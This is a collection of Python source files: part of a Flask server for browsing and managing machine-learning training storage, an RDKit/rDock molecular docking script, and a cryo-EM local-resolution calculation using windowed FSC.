'# -*- encoding: utf-8 -*-\n'
'from madoka.board.server import _make_report\n'
'_make_report(%r, %r, %r, %r)' %
(parent, name, exp_id, fix_permissions)
],
stderr=gevent.subprocess.STDOUT
)
return {'error': 0, 'message': ''}
except CalledProcessError as ex:
msg = (
'Failed to generate report for storage %r: '
'exit code is %d.' % (path, ex.returncode)
)
getLogger(__name__).warning(msg)
getLogger(__name__).info(ex.output.decode('utf-8'))
return {'error': 1, 'message': msg}
@json_response
def storage_api(self, path):
# parse the request body
action = request.get_json(force=True)
if not isinstance(action, dict):
raise BadRequest()
op = action['op']
if op not in ('delete', 'make_report', 'add_tags', 'remove_tags'):
raise BadRequest()
# ensure the storage exists
root = self.get_storage_root(path)
parent, name = os.path.split(root.rstrip('/'))
if not parent:
msg = 'Parent directory of storage %r is empty!' % path
return {'error': 1, 'message': msg}
if op == 'delete':
# dispatch the delete action
ret = self._storage_delete(path, parent, name)
elif op == 'make_report':
# dispatch the make report action
ret = self._storage_make_report(path, parent, name)
else:
# parse tags
if 'tags' not in action:
raise BadRequest()
tags = action['tags']
if not isinstance(tags, list) or \
not all(isinstance(s, str) for s in tags):
raise BadRequest()
# dispatch the tags action
ret = self._storage_change_tags(path, parent, name, tags, op)
return ret
class _RootApp(Flask):
"""Flask application of Madoka Board.
Parameters
----------
server : MadokaBoardServer
The Madoka Board application server.
"""
def __init__(self, server):
super(_RootApp, self).__init__(__name__, static_url_path='/_static')
# memorize the server
self.server = server
# add url routes
self.add_url_rule('/', view_func=self.index)
self.add_url_rule('/_settings', view_func=self.settings)
self.add_url_rule('/_snapshot', view_func=self.snapshot)
# cache of static file hashes
self._file_hash_cache = {}
def index(self):
return render_template('index.html')
@json_response
def settings(self):
return {
'scan_interval': self.server.scan_interval
}
@json_response
def snapshot(self):
return [
(s.path, s.tags, s.status, s.modify_time)
for s in self.server.collector.snapshot
]
def inject_url_defaults(self, endpoint, values):
"""
Injects an "h" parameter on the URLs of static files that contains a
hash of the file. This allows the use of aggressive cache settings on
static files, while ensuring that content changes are reflected
immediately due to the changed URLs. Hashes are cached in-memory
and only checked for updates when the file mtime changes.
Source: https://gist.github.com/mfenniak/2978805
"""
super(_RootApp, self).inject_url_defaults(endpoint, values)
if endpoint == "static" and "filename" in values:
filepath = safe_join(self.static_folder, values["filename"])
if os.path.isfile(filepath):
cache = self._file_hash_cache.get(filepath)
mtime = os.path.getmtime(filepath)
                if cache is not None:
cached_mtime, cached_hash = cache
if cached_mtime == mtime:
values["h"] = cached_hash
return
h = hashlib.md5()
with contextlib.closing(open(filepath, "rb")) as f:
h.update(f.read())
h = h.hexdigest()
self._file_hash_cache[filepath] = (mtime, h)
values["h"] = h
class MadokaBoardServer(object):
"""Madoka Board server.
Parameters
----------
storage_root : str | dict[str, str]
Path of the training storage, or mappings from URL prefix to
paths of training storage.
scan_interval : int
Number of seconds between two successive scans of training storage.
Default is 120.
port : int
Bind port number. Default is 8080.
interface : str
Bind interface.
If not specified, will bind to all interfaces.
chown_to_parent : bool
Whether or not to set the owner of newly created tags to
that of the parent directory?
debug : bool
Whether or not to turn on Flask debugging features?
Default is False.
"""
def __init__(self, storage_root, scan_interval=120, port=8080,
interface=None, chown_to_parent=False, debug=False):
# memorize arguments
if not isinstance(storage_root, dict):
storage_root = {'': os.path.realpath(storage_root)}
else:
storage_root = {
k.rstrip('/'): os.path.realpath(v)
for k, v in six.iteritems(storage_root)
}
self.storage_root = storage_root
self.scan_interval = scan_interval
self.port = port
self.interface = interface or ''
self.chown_to_parent = chown_to_parent
# create the snapshot collector
self.collector = _SnapshotCollector(storage_root, scan_interval)
# construct Flask application
self.app = _RootApp(self)
for k, v in six.iteritems(storage_root):
bp_name = 'storage_bp_%s' % v.strip('/').replace('/', '_')
self.app.register_blueprint(
_StorageBlueprint(bp_name, v, url_prefix=k)
)
# turn on debug features
if debug:
self.app.config['DEBUG'] = True
self.app.config['SEND_FILE_MAX_AGE_DEFAULT'] = 0
# make the Flask application aware of template changes
self.app.config['TEMPLATES_AUTO_RELOAD'] = True
# initialize the server
self.http = WSGIServer((self.interface, self.port), self.app)
def run(self):
"""Run the server in foreground."""
if self.interface:
endpoint = '%s:%s' % (self.interface, self.port)
else:
endpoint = str(self.port)
getLogger(__name__).info(
'Madoka Board server listening at %s', endpoint)
self.collector.start_watcher()
self.http.serve_forever()
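# Minimal usage sketch (storage path and port are placeholders, not part of the module):
#
#   if __name__ == '__main__':
#       server = MadokaBoardServer('/data/train_storage', scan_interval=120, port=8080)
#       server.run()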
|
rdock_test_MP.py
|
from rdkit import Chem
from rdkit.Chem import AllChem
import subprocess
#import threading
from multiprocessing import Process
import os
import shutil
import time
def docking_calculation(cmd):
proc = subprocess.call( cmd , shell=True)
print('end in thread')
#----parameter & preparation
def rdock_score(compound, score_type, target_dir, docking_num = 10):
# check RBT_ROOT setting:
    RBT_ROOT = os.environ.get('RBT_ROOT')
    if RBT_ROOT is None:
        print("RBT_ROOT has not been defined, please set it before use!")
        exit(0)
    else:
        print('RBT_ROOT is: ', RBT_ROOT)
input_smiles = str(compound)
num_cpus = docking_num # total number of docking
score_name = score_type # SCORE or SCORE.INTER ## edit by Biao Ma at 20190920
target_dir = target_dir
sdf_file = 'tmp_comp.sdf'
docking_result_file = 'rdock_out_'
min_score = 10**10
min_score_inter = 10**10
min_score_id = 0
min_score_inter_id = 0
path=os.getcwd()
os.chdir(path)
#----Translation from SMILES to sdf
fw = Chem.SDWriter(sdf_file)
m1 = Chem.MolFromSmiles(input_smiles)
try:
if m1!= None:
m = Chem.AddHs(m1)
cid = AllChem.EmbedMolecule(m)
#fw.write(m)
opt = AllChem.UFFOptimizeMolecule(m,maxIters=200)
print('3D structure optimization by AllChem.UFFOptimizeMolecule(m,maxIters=200) :', opt)
fw.write(m)
fw.close()
#----rdock calculation
#cmd = '/home/terayama/rdock/fiexed_side_chain/build/exe/rbdock -r cavity.prm -p /home/terayama/rdock/fiexed_side_chain/data/scripts/dock.prm -i ' + sdf_file + ' -o ' + docking_result_file + ' -T 0 -n' + str(num_docking_unit)
#proc = subprocess.call( cmd , shell=True)
#proc = subprocess.popen(cmd, shell=True)
#r1 = p1.wait()
#print('r1', p1)
start_time = time.time()
processes = []
for i in range(num_cpus):
#cmd = '/home/terayama/rdock/fiexed_side_chain/build/exe/rbdock -r cavity.prm -p /home/terayama/rdock/fiexed_side_chain/data/scripts/dock.prm -i ' + sdf_file + ' -o ' + docking_result_file + str(i) + ' -T 0 -s '+str(i)+' -n 1'
#cmd = 'rbdock -r cavity.prm -p /home/mki/SideEffectPrediction/08_rDock/prm/dock.prm -i ' + sdf_file + ' -o ' + docking_result_file + str(i) + ' -T 0 -s '+str(i)+' -n 1'
cmd = RBT_ROOT + '/bin/rbdock -allH -r '+ target_dir + '/cavity.prm -p '+ RBT_ROOT + '/data/scripts/dock.prm -i ' + sdf_file + ' -o ' + docking_result_file + str(i) + ' -T 0 -s '+str(i)+' -n 1'
print('cmd', cmd)
#t = threading.Thread(target=docking_calculation, args=(cmd,))
#threads.append(t)
#t.start()
t = Process(target=docking_calculation, args=(cmd,))
processes.append(t)
for p in processes:
p.start()
for p in processes:
p.join()
print('end')
end_time = time.time()
#print('time used:%s' % end_time - start_time)
print('docking time_used', end_time - start_time)
for i in range(num_cpus):
#----find the minimum score of rdock from multiple docking results
f = open(docking_result_file+str(i)+'.sd')
lines = f.readlines()
f.close()
line_count = 0
score_line = -1
score_inter_line = -1
for line in lines:
v_list = line.split()
if line_count == score_line:
print(v_list[0])
if float(v_list[0]) < min_score:
min_score = float(v_list[0])
min_score_id = i
if line_count == score_inter_line:
print(v_list[0])
if float(v_list[0]) < min_score_inter:
min_score_inter = float(v_list[0])
min_score_inter_id = i
if len(v_list) <= 1:
line_count += 1
continue
if v_list[1] == '<SCORE>':
score_line = line_count + 1
if v_list[1] == '<SCORE.INTER>':
score_inter_line = line_count + 1
line_count += 1
print('minimum rdock score', min_score, 'score_inter', min_score_inter)
except:
print('error')
min_score=10**10
min_score_inter = 10**10
os.chdir(path)
    #os.mkdir('out') # create the directory for the best rdock output for the new compound.
best_docking_id = min_score_id if score_type == 'SCORE' else min_score_inter_id
return [min_score, min_score_inter, best_docking_id]
# Example call matching the signature above: rdock_score('Oc1ccc(NC(=O)C)cc1', 'SCORE.INTER', 'kith', docking_num=1)
|
localResolutions.py
|
import numpy as np
import functools
import multiprocessing
import math
from FSCUtil import FSCutil
from confidenceMapUtil import FDRutil
from scipy.interpolate import RegularGridInterpolator
#------------------------------------------------------------
def localResolutions(halfMap1, halfMap2, boxSize, stepSize, cutoff, apix, numAsymUnits, mask, maskPermutation):
# ********************************************
# ****** calculate local resolutions by ******
# ********** local FSC-thresholding **********
# ********************************************
print("Starting calculations of local resolutions ...");
sizeMap = halfMap1.shape;
locRes = np.zeros((len(range(boxSize, boxSize + sizeMap[0], stepSize)),
len(range(boxSize, boxSize + sizeMap[1], stepSize)),
len(range(boxSize, boxSize + sizeMap[2], stepSize))));
# pad the volumes
paddedHalfMap1 = np.zeros((sizeMap[0] + 2 * boxSize, sizeMap[1] + 2 * boxSize, sizeMap[2] + 2 * boxSize));
paddedHalfMap2 = np.zeros((sizeMap[0] + 2 * boxSize, sizeMap[1] + 2 * boxSize, sizeMap[2] + 2 * boxSize));
paddedMask = np.zeros((sizeMap[0] + 2 * boxSize, sizeMap[1] + 2 * boxSize, sizeMap[2] + 2 * boxSize));
paddedMaskPermutation = np.zeros((sizeMap[0] + 2 * boxSize, sizeMap[1] + 2 * boxSize, sizeMap[2] + 2 * boxSize));
paddedHalfMap1[boxSize: boxSize + sizeMap[0], boxSize: boxSize + sizeMap[1],
boxSize: boxSize + sizeMap[2]] = halfMap1;
paddedHalfMap2[boxSize: boxSize + sizeMap[0], boxSize: boxSize + sizeMap[1],
boxSize: boxSize + sizeMap[2]] = halfMap2;
paddedMask[boxSize: boxSize + sizeMap[0], boxSize: boxSize + sizeMap[1], boxSize: boxSize + sizeMap[2]] = mask;
paddedMaskPermutation[boxSize: boxSize + sizeMap[0], boxSize: boxSize + sizeMap[1], boxSize: boxSize + sizeMap[2]] = maskPermutation;
halfBoxSize = int(boxSize / 2.0);
# make Hann window
hannWindow = FDRutil.makeHannWindow(np.zeros((boxSize, boxSize, boxSize)));
numCalculations = len(range(boxSize, boxSize + sizeMap[0], stepSize)) * len(
range(boxSize, boxSize + sizeMap[1], stepSize)) * len(range(boxSize, boxSize + sizeMap[0], stepSize));
print("Total number of calculations: " + repr(numCalculations));
# ****************************************************
# ********* get initial permuted CorCoeffs ***********
# ****************************************************
print("Do initial permuations ...");
for i in range(10):
xInd = np.random.randint(boxSize, sizeMap[0] + boxSize);
yInd = np.random.randint(boxSize, sizeMap[1] + boxSize);
zInd = np.random.randint(boxSize, sizeMap[2] + boxSize);
#xInd = np.random.randint(sizeMap[0]/2 - sizeMap[0]/8 + boxSize, sizeMap[0]/2 + sizeMap[0]/8 + boxSize);
#yInd = np.random.randint(sizeMap[1]/2 - sizeMap[1]/8 + boxSize, sizeMap[1]/2 + sizeMap[1]/8 + boxSize);
#zInd = np.random.randint(sizeMap[2]/2 - sizeMap[2]/8 + boxSize, sizeMap[2]/2 + sizeMap[2]/8 + boxSize);
#generate new locations until one is found in the mask
while ((paddedMaskPermutation[xInd, yInd, zInd] < 0.5)):
xInd = np.random.randint(boxSize, sizeMap[0] + boxSize);
yInd = np.random.randint(boxSize, sizeMap[1] + boxSize);
zInd = np.random.randint(boxSize, sizeMap[2] + boxSize);
#xInd = np.random.randint(sizeMap[0] / 2 - sizeMap[0] / 8 + boxSize,
# sizeMap[0] / 2 + sizeMap[0] / 8 + boxSize);
#yInd = np.random.randint(sizeMap[1] / 2 - sizeMap[1] / 8 + boxSize,
# sizeMap[1] / 2 + sizeMap[1] / 8 + boxSize);
#zInd = np.random.randint(sizeMap[2] / 2 - sizeMap[2] / 8 + boxSize,
# sizeMap[2] / 2 + sizeMap[2] / 8 + boxSize);
#get windowed parts
windowHalfmap1 = paddedHalfMap1[xInd - halfBoxSize: xInd - halfBoxSize + boxSize,
yInd - halfBoxSize: yInd - halfBoxSize + boxSize,
zInd - halfBoxSize: zInd - halfBoxSize + boxSize];
windowHalfmap2 = paddedHalfMap2[xInd - halfBoxSize: xInd - halfBoxSize + boxSize,
yInd - halfBoxSize: yInd - halfBoxSize + boxSize,
zInd - halfBoxSize: zInd - halfBoxSize + boxSize];
# apply hann window
windowHalfmap1 = windowHalfmap1 * hannWindow;
windowHalfmap2 = windowHalfmap2 * hannWindow;
res, _, _, _, _, _, tmpPermutedCorCoeffs = FSCutil.FSC(windowHalfmap1, windowHalfmap2, None, apix, cutoff, numAsymUnits,
True, False, None, False);
if i == 0:
# initialize the array of correlation coefficients
permutedCorCoeffs = tmpPermutedCorCoeffs;
else:
# append the correlation coefficients
for resInd in range(len(tmpPermutedCorCoeffs)):
permutedCorCoeffs[resInd] = np.append(permutedCorCoeffs[resInd], tmpPermutedCorCoeffs[resInd]);
# ****************************************************
# ********* calculate the local resolutions **********
# ****************************************************
print("Do local FSC calculations ...");
# generate partial function to loop over the whole map
partialLoopOverMap = functools.partial(loopOverMap, paddedMask=paddedMask, paddedHalfMap1=paddedHalfMap1,
paddedHalfMap2=paddedHalfMap2, boxSize=boxSize, sizeMap=sizeMap,
stepSize=stepSize, halfBoxSize=halfBoxSize,
hannWindow=hannWindow, apix=apix, cutoff=cutoff, numAsymUnits=numAsymUnits,
permutedCorCoeffs=permutedCorCoeffs);
#parallelized local resolutions
numCores = min(multiprocessing.cpu_count(),4);
print("Using {:d} cores. This might take a few minutes ...".format(numCores));
iIterable = range(boxSize, boxSize + sizeMap[0], stepSize);
#initialize parallel processes
lenInt = int(math.ceil(len(iIterable)/float(numCores)));
queue = multiprocessing.Queue();
#start process for each core and run in parallel
for i in range(numCores):
#split the iterable
startInd = (i*lenInt);
endInd = (i+1)*lenInt;
if i == (numCores-1):
seq = range(iIterable[startInd], iIterable[len(iIterable)-1]+stepSize, stepSize);
else:
seq = range(iIterable[startInd], iIterable[endInd], stepSize);
#start the respective process
proc = multiprocessing.Process(target=partialLoopOverMap, args=(seq, queue,));
proc.start();
#addition of indiviual local resolution maps to produce the final one
for i in range(numCores):
locRes = locRes + queue.get();
# *************************************
# ********** do interpolation *********
# *************************************
#locRes[locRes==0] = 2.2;
print("Interpolating local Resolutions ...");
x = np.linspace(1, 10, locRes.shape[0]);
y = np.linspace(1, 10, locRes.shape[1]);
z = np.linspace(1, 10, locRes.shape[2]);
myInterpolatingFunction = RegularGridInterpolator((x, y, z), locRes, method='linear')
xNew = np.linspace(1, 10, sizeMap[0]);
yNew = np.linspace(1, 10, sizeMap[1]);
zNew = np.linspace(1, 10, sizeMap[2]);
xInd, yInd, zInd = np.meshgrid(xNew, yNew, zNew, indexing='ij', sparse=True);
localRes = myInterpolatingFunction((xInd, yInd, zInd));
localRes[mask <= 0.01] = 0.0;
return localRes;
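# Illustrative call (half maps and masks are assumed to be numpy arrays loaded
# elsewhere, e.g. from MRC files; the parameter values below are placeholders):
#   locRes = localResolutions(half1, half2, boxSize=20, stepSize=5, cutoff=0.143,
#                             apix=1.0, numAsymUnits=1, mask=mask, maskPermutation=mask);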
#-----------------------------------------------------------------
def loopOverMap(iSeq, queue, paddedMask, paddedHalfMap1, paddedHalfMap2, boxSize, sizeMap,
stepSize, halfBoxSize, hannWindow, apix, cutoff, numAsymUnits, permutedCorCoeffs):
# ********************************************
# ******* iterate over the map and calc ******
# ************ local resolutions *************
# ********************************************
locRes = np.zeros((len(range(boxSize, boxSize + sizeMap[0], stepSize)),
len(range(boxSize, boxSize + sizeMap[1], stepSize)),
len(range(boxSize, boxSize + sizeMap[2], stepSize))));
for i in iSeq:
iInd = int((i-boxSize)/stepSize);
jInd = 0;
for j in range(boxSize, boxSize + sizeMap[1], stepSize):
kInd = 0;
for k in range(boxSize, boxSize + sizeMap[2], stepSize):
if paddedMask[i, j, k] > 0.99:
window_halfmap1 = paddedHalfMap1[i - halfBoxSize: i - halfBoxSize + boxSize,
j - halfBoxSize: j - halfBoxSize + boxSize,
k - halfBoxSize: k - halfBoxSize + boxSize];
window_halfmap2 = paddedHalfMap2[i - halfBoxSize: i - halfBoxSize + boxSize,
j - halfBoxSize: j - halfBoxSize + boxSize,
k - halfBoxSize: k - halfBoxSize + boxSize];
# apply hann window
window_halfmap1 = window_halfmap1 * hannWindow;
window_halfmap2 = window_halfmap2 * hannWindow;
_, _, _, _, _, tmpRes, _ = FSCutil.FSC(window_halfmap1, window_halfmap2, None, apix, cutoff,
numAsymUnits,
True, False, permutedCorCoeffs, False);
locRes[iInd, jInd, kInd] = tmpRes;
else:
locRes[iInd, jInd, kInd] = 0.0;
kInd = kInd + 1;
jInd = jInd + 1;
#push back the local resolution map to the list
queue.put(locRes);
|